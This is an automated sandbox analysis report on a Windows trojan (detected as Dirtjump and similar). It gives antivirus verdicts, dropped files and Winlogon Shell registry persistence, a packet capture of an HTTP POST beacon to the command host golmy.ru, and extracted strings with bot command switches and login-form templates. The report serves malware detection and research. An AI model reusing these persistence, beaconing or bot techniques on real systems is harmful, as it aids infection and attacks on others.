Analysis Date2015-12-14 20:52:39
MD5d990a3d5e45b4cc657f9238a66c23e12
SHA19f5a8bb7b02b46a974a7b351c617a43d2f1ccea9

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: sha1: size:
Section.data md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.xcpad md5: sha1: size:
Section.idata md5: 93b82342b4b07d71dcaeaa2467d0abd1 sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259 size: 2048
Section.reloc md5: 791bb323f186de559bae99be5ccf0dc5 sha1: 6363d61b6ffc408b08cc71af73085cec092a5b50 size: 2048
Section.rsrc md5: 9296019393cd10c9017c94cb1b77f691 sha1: b3d1896803c9f700e075da9bc130d6aac3b0791d size: 28160
Timestamp
VersionLegalCopyright:
PackagerVersion:
InternalName:
FileVersion:
CompanyName:
Comments:
ProductName:
ProductVersion:
FileDescription:
Packager:
OriginalFilename:
Packer
PEhash
IMPhash2db53d48dd1f35054e31bffab1f4f814
AVAd-AwareGen:Variant.Barys.20804
AVAlwil (avast)Virtu-F:Win32:Virtu-F
AVArcabit (arcavir)Gen:Variant.Barys.20804
AVAuthentiumW32/Virut.AI!Generic
AVAvira (antivir)TR/ATRAPS.Gen
AVBitDefenderGen:Variant.Barys.20804
AVBullGuardGen:Variant.Barys.20804
AVCA (E-Trust Ino)Win32/Virut.17408!corrupt
AVCAT (quickheal)no_virus
AVClamAVno_virus
AVDr. WebTrojan.PWS.Tibia.2413
AVEmsisoftGen:Variant.Barys.20804
AVEset (nod32)Win32/Spy.Delf.PKE
AVF-SecureGen:Variant.Barys.20804
AVFortinetW32/Delf.PHQ!tr
AVFrisk (f-prot)W32/Virut.AI!Generic
AVGrisoft (avg)Win32/DH{ggZn?}
AVIkarusBackdoor.Win32.HacDef
AVK7Riskware ( 0040eff71 )
AVKasperskyBackdoor.Win32.Generic
AVMalwareBytesTrojan.Injector.DF
AVMcafeeno_virus
AVMicroWorld (escan)Gen:Variant.Barys.20804
AVMicrosoft Security EssentialsTrojan:Win32/Dishigy.J
AVRisingno_virus
AVSymantecTrojan.Dirtjump
AVTrend Microno_virus
AVTwisterno_virus
AVVirusBlokAda (vba32)no_virus
AVZillya!no_virus

Runtime Details:

Screenshot

Process
↳ C:\9f5a8bb7b02b46a974a7b351c617a43d2f1ccea9.exe

Creates FileC:\Windows\resources\themes\Aero\Shell\NormalColor\ShellStyle.dll
Creates FileC:\
Creates FileC:\9f5a8bb7b02b46a974a7b351c617a43d2f1ccea9.exe
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates FileC:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db
Creates FileC:\desktop.ini
Creates FileC:\Windows\servos.exe
Creates FileC:\ProgramData\systemskey.ini
Creates FileC:\ProgramData\systemskey.ini
Creates FileNsi
Creates Mutex
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe, servos.exe\\x00

Network Details:


Raw Pcap
0x00000000 (00000)   504f5354 202f7772 67746866 35343367   POST /wrgthf543g
0x00000010 (00016)   2f204854 54502f31 2e310d0a 486f7374   / HTTP/1.1..Host
0x00000020 (00032)   3a20676f 6c6d792e 72750d0a 55736572   : golmy.ru..User
0x00000030 (00048)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000040 (00064)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000050 (00080)   204d5349 4520382e 303b2057 696e646f    MSIE 8.0; Windo
0x00000060 (00096)   7773204e 5420362e 313b2054 72696465   ws NT 6.1; Tride
0x00000070 (00112)   6e742f34 2e303b20 534c4343 323b202e   nt/4.0; SLCC2; .
0x00000080 (00128)   4e455420 434c5220 322e302e 32303439   NET CLR 2.0.2049
0x00000090 (00144)   36393b20 2e4e4554 20434c52 20332e35   69; .NET CLR 3.5
0x000000a0 (00160)   2e323034 3936393b 202e4e45 5420434c   .204969; .NET CL
0x000000b0 (00176)   5220332e 302e3230 34393639 0d0a4163   R 3.0.204969..Ac
0x000000c0 (00192)   63657074 3a202a2f 2a3b713d 302e310d   cept: */*;q=0.1.
0x000000d0 (00208)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x000000e0 (00224)   3a20677a 69702c64 65666c61 74650d0a   : gzip,deflate..
0x000000f0 (00240)   41636365 70742d4c 616e6775 6167653a   Accept-Language:
0x00000100 (00256)   2072752d 52552c72 753b713d 302e382c    ru-RU,ru;q=0.8,
0x00000110 (00272)   656e2d55 533b713d 302e352c 656e3b71   en-US;q=0.5,en;q
0x00000120 (00288)   3d302e33 0d0a436f 6e6e6563 74696f6e   =0.3..Connection
0x00000130 (00304)   3a204b65 65702d41 6c697665 0d0a436f   : Keep-Alive..Co
0x00000140 (00320)   6e74656e 742d4c65 6e677468 3a203137   ntent-Length: 17
0x00000150 (00336)   0d0a436f 6e74656e 742d5479 70653a20   ..Content-Type: 
0x00000160 (00352)   6170706c 69636174 696f6e2f 782d7777   application/x-ww
0x00000170 (00368)   772d666f 726d2d75 726c656e 636f6465   w-form-urlencode
0x00000180 (00384)   640d0a0d 0a6b3d32 6f75706d 716a3639   d....k=2oupmqj69
0x00000190 (00400)   36743034 6736                         6t04g6


Strings
StringX
TObject
u:hD
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
]_^[
SVWU
w;;t$
]_^[
SVWU
]_^[
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
uW;{
u:;{
]_^[
ZYYd
ZYYd
SVWU
]_^[
YZ^[
SVWU
]_^[
ZYYd
_^[YY]
QSVW
UhN"@
ZYYd
hU"@
_^[Y]
SVWU
$;L$
$)D$
YZ]_^[
QSVW
ZYYd
_^[Y]
YZXu
SVWU
C<"u1S
Q<"u8S
7CF;
7CF;
]_^[
Ht Ht.
r/f=
w)f%
SVWQ
SVWR
	w%9
~KxI[)
2_^[
YZXt5
YX_^

hd1@
Uh=1@
ZYYd
hD1@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PPRTj
YYZX
YZXtp
VWUd
SPRQ
T$(j
SVWU
]_^[
]_^[
d$,1
,t\=
t=HtN
r6t0
t.Ht
Ph*7@
ZYYd
_^[]
Uhr8@
ZYYd
_^[]
SVWU
]_^[
;_^[
t!R:
SVWRP
Z_^[X
uXJt
uAJt
u:Jt
It2S
t&J|
N|*9
t1SVW
;_^[
PSVW
_^[X
_^[X
ZYYd
_^[YY]
ZYYd
Uh&C@
ZYYd
h-C@
Uh~C@
ZYYd
ZYYd
ZYYd
ZYYd
UhIG@
ZYYd
hPG@
| C3
	TRegistry
TCommand0
h8J@
ZYYd
h$J@
QSVW
_^[Y]
QZ^&
QSVW
_^[Y]
SVW3
ZYYd
ZYYd
^[YY]
QQQQQQSVW
UhaY@
ZYYd
hhY@
ZYYd
^[Y]
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
gui,vkxoiq
Software
Microsoft
Windows NT
CurrentVersion
Winlogon
explorer.exe,
Shell
QQQQQQQSVW3
UhO`@
h|`@
Uh*`@
ZYYd
ZYYd
hV`@
gui,vkxoiq
hh_@
; WOW64
Bangladesh
Russia
United Kingdom
Egypt
China
Iran
Mongolia
India
Grenada
Thailand
Romania
Germany
France
Ukraine
United States
ZYYd
ZYYd
_^[YY]
QQQQQSVW
Uhce@
Uh>e@
ZYYd
ZYYd
hje@
.com
.net
.org
http://
h0h@
h<h@
hLh@
hph@
h|h@
h0h@
hph@
h0h@
hHi@
h`i@
ZYYd
Mozilla/5.0 (Windows NT
; rv:
.0) Gecko/20100101 Firefox/
Opera/9.80 (Windows NT
; U; Edition
 Local; ru) Presto/2.10.289 Version/
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
; Trident/4.0; SLCC2; .NET CLR 2.0.
; .NET CLR 3.5.
; .NET CLR 3.0.
h\n@
hpn@
h|n@
hTo@
hto@
ZYYd
https://
http://
error1
error2
error3 (
 HTTP/1.1
Host:
User-Agent:
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer:
POST
Content-Length:
Content-Type: application/x-www-form-urlencoded
error4 (Send)
ZYYd
ZYYd
SVWU
]_^[
SVWU
]_^[
QSVW
_^[Y]
Sh|t@
_^[]
QQQQQSVW
UhMy@
ZYYd
ZYYd
hTy@
SVW3
ZYYd
UhV{@
ZYYd
ZYYd
kkm,|ampqcwo{p
QSVW3
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
wo2wphqd
1d728bjqkpz+
63G/E,81<.H275;78A64=2FBDCF3:.8C
"7xqrD
<qrcj=/oiqX
POST
200 OK
-get
-post1
-post2
-ip
-ip2
-request
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
-timeout
-thread
https://
http://
POST
 HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://
Content-Length:
Content-Type: application/x-www-form-urlencoded
GET
Referer:
ZYYd
ZYYd
Error
Runtime error     at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
GetTokenInformation
FreeSid
EqualSid
AllocateAndInitializeSid
kernel32.dll
Sleep
MoveFileA
GetLastError
GetCurrentThread
GetCurrentProcess
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitThread
CreateThread
CloseHandle
wsock32.dll
WSAStartup
gethostbyname
socket
shutdown
setsockopt
send
recv
inet_addr
htons
connect
closesocket
shell32.dll
SHFileOperationA
SHGetSpecialFolderPathA
0,080<0@0D0H0L0P0T0b0j0r0z0
1"1*121:1B1J1v1~1
1H2O2
4,5p5
7*8G8R8]8e8o8y8
9%9-989>9K9Q9k9r9|9
:+:J:b:j:
;/;M;w<
=!>?>D>J>
?#?9?_?k?s?
0-050;0D0K0P0V0i0r0
1#121B1b1z1
2&262<2D2
2-343D3N3T3\3b3h3o3y3 4I4g4s4{4
5'5O5h5
8'9P9W9^9.:C:v:
:(;/;
<-<6<=?E?N?
1/1F1[1
2V3j3r3
4(4;4k4
7&7>7`7
738F8Z8
9,969[9e9o9w9}9
1*212C2a2j2v2}2
3;3G3N3X3b3y3
3&4;4L4V4^4f4n4v4
5&52575<5C5J5T5k5w5
6&6.666>6F6N6V6^6f6n6v6~6
7+777D7V7
7D8P8d8l8p8t8x8|8
8D8G9r9
:7:O:
=6=Y=
>#>1>?>Q>^>
1!1%1)1-1115191=1A1E1I1M1Q1U1\1j1x1
2 2J3X3
4%4E4I4M4Q4U4Y4x4
5$5Q5
7'777G7d7
:6:Z:
: ;8;Q;j;o;w;|;
<9<k<|<
I0s0
0)1D1
818W8q8
:4:<:K:\:h:
:_;v;
<!<\<r<w<
=$=5=I=U=y=
>3>K>c>
?+?D?h?
0<1Z1y1
2+2<2S2w2
3)3=3Y3i3
404d4
405A5V5
6T6m6
7$7B7V7
7(8C8w8
8(9N9|9
:.:3:8:L:Q:V:l:q:v:{:
;9;E;Y;^;c;w;|;
=-=C=X=x=
2 2*252G2\2`2d2h2l2p2t2x2|2
004080
&=O8
cdcdfd
UTypes
System
SysInit
WinSock
KWindows
;9o,
|u#A
/%JF|
z6Y_m=eY
c{[Q6
_oTen
v0w{
{wOk`
{EzOj
=[srS(
8tHGE
8-u@u
7`9SBK
NuY0
b}[6V
,e3I
{ufU
j"hh,~
M&FuRE
2 R0hX
#Y^F
qs+3
Ba)PQ
-K&0H
yLQC
/s-m
O$2W
ct,A9
{&e,`
qCn?
|;8sTo'
W.:1 ,
2gTk
5$9F
D:oo<q
UIAX]
Igxmv
4zrn5
5J%c
V2j&n*
Ww()oO
M}%p
hvrI.
"/A #
!sdD
d4xZ|
r|=_p4
4J^J
j]"pa
t:TE6
Yh>r
5l<!
cEx%j
k3l'
" SyBrb
x[l9
B:m_R
&YBu
$jS=
I?}#
-	B}L&*
`%B7;rB
'8UwX/
oEXA
<g~a
.x6"
qd?Wk+
V;au
1\J7
Lne*
:~<.
^R]Os
Acx-
x}1i
E\K6B
v{,+
s zT
C\wA;
?>_+
o&5D
 &t~@
e*g\4@
	KRA
/E3d
%rT.
}<LF
w{MX
Ipf)
/]=Gt
D{@)
6SIxv_l
f%;(
Bd}u
da2Z
0S[z
6H^G
l!2;
)eFb
dg7eq
s;uQ
o9]n
XTVi
 PK)
4JEK
b'R#
?}+5
:A<I
*n.J
yhvlg
7Ntu
)y+NY
tdHnl
w_+'
C8MC
}[Xf
7@;U
9NId
^~J7
![QE7
uy?G
S0R9
j>iD3
OkL2D
|:G="mu
:O-=
'2iZ&TkEc
Wgct1
*BMv:c
cOr,
]~Y\Z
XH@W
$=M5
'Et$
@.@~
Sce,
ZR`P
(j(<
W];B
_'E(
-"r)
*Y T
ID]l
B=!SiM"
S~LVZ
Rr7f
=})S*
A~9q
KT>*
/>'q
,e6Tj
v_u%
c!`p
/BX<
IWo.
p0GQ
&#=E
h'5*
Eq>]
]BgD
OP$o
ttJTw1
2ulr
Da{R
#}lpf
R9Y|Bg
Vvh'N
/	/<
B"vL
1 ]y
i=&&'
-L=fs
td*n
YW(bJ
={$f{
-,wf(
VICpC
6$)7
w?!Y
&)|TQ.
?%j>R
T[xGI
-cQ&~
ofxx
:[US
EUM5
sQGcd
/?V0
EbXy
H~Bu
l"yW6$
qlPW
`@Ykx
:v4B
mf8nX
EIZB
4WDC
Pc|GJ
,N8O
zgbM
X8w`
mI8?~
Bg}\
tF&b
-9^vr
fN1D
Wh\Z
S7'o#
g{$@B
kc{-
4j 1
XJK,
;Va"
X+;j
Es3cA
o[>B
RmCV
-5%- m
f4hS
L|Z:k
QIez'd
QV3z
YR~ad
s4)@
4}	"w*
R^jG
^E	b
FJ]=a&
`zA./
\-\Ul
-+>R
9<&=-=
=Ll)
nzw=
.HdG
gs,?
f5-p
9QRTf
0)sI
%qQ-
pe4G7g
LfDp
VbP?J
ARI@,
	$i^0q
84x"
s4;U
s}3a
6h1_
`2)*a=Z
6Wydq
73)U
i\\n
Ym~FA
RA,\
k\XACS
6A{O4j
xj(A2
^s:0
=dg?3
@ZgO
7	az
"b^k}|\a
.k^
I^M|B
T(P;
/j(:>j
:0fZ
X&6G
2O:q
a *d
)f*h
&.EL
W&8	.kr3
I%BE
HN	w
:qxy.
dg1
gU%~
 P-,\
0*),Q
M\5#
I74D.
\x|Sx
-i~d
)z+9R
+U,1
\iUk
;w33
0|h+2X
	i}]e3
w!{M
_;!j
lIpd
xEg[
[F,J
)`'c
%5H+
Mjj8@V3
@H^(
DHX"R
{}V;Ja
O$wA
*_Q@*.
$MeL
oT<_
\/5z)
~FbI*
Ur7W
.+`B}
Yd8.<
XT)w
UEb[>
:?Q5
yH-k
9\Z9
!50p
bccdb4)
LYh"
*p*g
:(GQuQ
:^De,B
tFhB
0-[L
1.-<
zG.L
W!	J>i
s;my
r6_s
Y_,c
*F	A
{ZLg
+A4F
0$$P
,mlY
?f?z
D1/1R
q5IO|
<l)V
v5Ub
<9xaF
^SnG
CC3D$
;+t$(
y+D$0